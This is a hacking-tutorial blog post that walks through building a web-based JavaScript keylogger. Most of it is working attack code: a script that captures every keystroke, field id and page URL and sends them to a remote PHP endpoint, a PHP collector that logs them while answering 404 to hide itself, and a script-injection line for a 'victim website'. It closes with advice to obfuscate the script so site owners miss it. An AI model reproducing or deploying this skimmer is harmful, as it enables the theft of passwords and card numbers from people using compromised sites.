NeosLab.com
Gathering

Create a Web-Based Javascript Keylogger

Researchers estimate thousands of ecommerce sites are under attack by a single threat actor that has infected servers with a web-based keylogger.

Popular ecommerce sites have been infected with web-based keyloggers that are being used to steal credit card data as it’s entered into online checkout forms. More than 100 compromised sites have been identified, but the number could be in the thousands.

Source: threatpost.com

WHAT WE CAN DO WITH A KEYLOGGER ?

Keylogger is a type of software that once active on a system, has the capability to record every keystroke made by the system. All the recorded keystroke is saved in a log file. A keylogger can record a message, email, and capture any type of information you type at any time using your keyboard.


WHO USES A KEYLOGGER ?

A keylogger is a surveillance tool, used by employers to ensure employee use work computers for business purposes only. There’s also a growing market of parents who want to use this tools to stay informed about a child’s online activities. But nowadays this tools is used by a hacker for hacking email id’s and confidential information of the user like password Social Security number, Credit Card etc … This is one of the easiest ways of extracting critical information by tricking people.

HOW IT WORKS ?

Below is an example for a simple web-based keylogger, In this documentation, you will know how keylogger works, type of programming by which we record and monitor each and every keystroke typed by the user in a website.

CREATE THE KEYLOGGER

First of all we have to create an environment for practical and follow the steps which we mention in details below.

Create HTML Form

<form action="#">
	<label>Firstname:</label>
	<input type="text" name="firstname" placeholder="Mickey" style="width:250px">
	<label>Lastname:</label>
	<input type="text" name="lastname" placeholder="Mouse" style="width:250px">
	<label>Message:</label>
	<textarea name="message" style="width:500px;height:100px;"></textarea>
	<input type="submit" value="Submit">
</form>

This HTML form is for the unique purpose to demonstrate how a web-based keylogger works.

Create JS Keylogger file – keylogger.js

if((window.jQuery))
{
	console.log("jQuery Found");
}
else
{
	console.log("jQuery Not Found");
	var script = document.createElement('script');
	script.src = 'https://code.jquery.com/jquery-3.3.1.min.js';
	document.body.appendChild(script);
}

function c(d)
{
	jQuery.ajax(
	{
		dataType: "jsonp",
		type:"GET",
		url: "https://example.com/keylogger.php", // Your Keylogger URL
		jsonp:"keypressed",
		data:
		{
			altnKey:d.altKey?1:0,
			ctrlKey:d.ctrlKey?1:0,
			userKey:d.key,
			targKey:d.target.id,
			userURI:d.target.baseURI
		},
		async:false,
		success: function(data)
		{
			console.log(data);
		},
		error:function(xhr, ajaxOptions, thrownError)
		{
			console.log("Error");
		}
	});	
}

window.onload = function()
{
	window.addEventListener("keydown", function(e) 
	{
		c(e);
	});
}

The above code in JavaScript can be injected directly to the victim website or can be hosted remotely. The purpose of this code is to grab the keystroke of the user and send it to a remote server. Please be sure to replace “https://example.com/keylogger.php” with the real URL of your PHP file.

To save time we are going to do it with jQuery. So to avoid any errors the first thing we do is make sure that jQuery is present in the victim page, and load it in case we didn’t found it.

We declare a function “c“, where the parameter “d” which will be the key press. This function will have an Ajax call to the PHP file that receives the keystrokes.

Create PHP Keylogger file – keylogger.php

header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
header('Access-Control-Allow-Methods: GET, REQUEST, OPTIONS');
header('Access-Control-Allow-Credentials: true');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Content-Type, *');

$file = 'data.txt';
if(!file_exists($file)) 
{
	$fh = fopen($file, 'w');
}

function f($str)
{
	return trim(preg_replace("(\\\)","",htmlentities(strip_tags($str),ENT_QUOTES,'UTF-8')));
}

$altnKey=(int)$_GET['altnKey'];
$ctrlKey=(int)$_GET['ctrlKey'];
$userKey=f($_GET['userKey']);
$targKey=f($_GET['targKey']);
$userURI=f($_GET['URI']);

$string = $altnKey."|".$ctrlKey."|".$userKey."|".$targKey."|".$userURI."\n";

file_put_contents($file, $string, FILE_APPEND);

The server part is in PHP. There is nothing to explain about the above code, the purpose of the PHP file is to receive the keystroke value transfered in Ajax by the JavaScript and store it in a simple text file. The “keylogger.php” must be hosted to a remote server and the full file URL must be specified in the “keylogger.js” file.

You can adapt the above code to match with your exact need. For example you maybe would like to save the results directly to a database or either send it to an e-mail address.

Inject the JS file

Now that we are ready with our file, we must inject the JavaScript in our victim website. To do it, we will add the below line of code at the end of our HTML file. In real situation, you must add this line between the tags. Please be sure to replace “https://example.com/keylogger.js” with the real URL of your JS file.

<script type="text/javascript" src="https://example.com/keylogger.js"></script>
DEMO

Now as a quick demonstration, let’s put all together and make a test to see if it’s work as expected. For the purpose of our test, we will use a common “Lamp” server to host our HTML file, and “neoslab.com” website to host our keylogger. For further information just feel free to watch the below video.

JAVASCRIPT OBFUSCATION

We can move further, using an obfuscation online tool in order to hide our JavaScript code and avoid the website owner to detect the keylogger at first sight.

Related posts

Port Scanning and OS Fingerprinting Basic Acknowledge

neoslab

The Most Usefull Nmap Commands

neoslab

What is Footprinting and Reconnaissance ?

neoslab

Leave a Comment

* By using this form you agree with the storage and handling of your data by this website.

Hey Wait!
Did you know ? You can build your Cyber security or IT career for FREE !
Make yourself happy, join our 8,000 members and receive FREE every day our latest tutorials and webinars to your mailbox!
Yes, Send it Over!
No Thanks!
close-link